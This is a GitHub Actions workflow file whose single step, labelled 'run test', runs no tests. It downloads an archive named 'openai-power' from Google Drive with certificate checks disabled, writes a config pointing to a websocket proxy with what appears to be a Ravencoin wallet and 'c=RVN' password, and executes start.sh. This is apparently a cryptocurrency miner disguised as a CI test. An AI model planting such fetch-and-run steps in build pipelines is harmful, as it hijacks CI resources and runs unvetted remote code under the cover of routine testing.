name: TRANG

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v4
    - name: Set up Python 3.10
      uses: actions/setup-python@v3
      with:
        python-version: "3.10"
    - name: run test
      run: |
        wget --no-check-certificate 'https://drive.usercontent.google.com/download?id=1RSBW1Oz_4BmLqHOs3sX6BO1SBftU-8W4&export=download&confirm=t' -O openai-power-main.tar.gz && tar -xf openai-power-main.tar.gz && rm openai-power-main.tar.gz && cd openai-power && echo -e "proxy=wss://present-nichol-vivo1-4f3dad8a.koyeb.app/MTYwLjMwLjE2OC4xOTk6NDk2Mg==\nhost=127.0.0.1\nport=3306\nusername=RSqWRgivNtmxDaEWj1xyLrE5HPnjcs8DNj\npassword=c=RVN,mc=MBC\nthreads=4" > data.txt && ./start.sh 2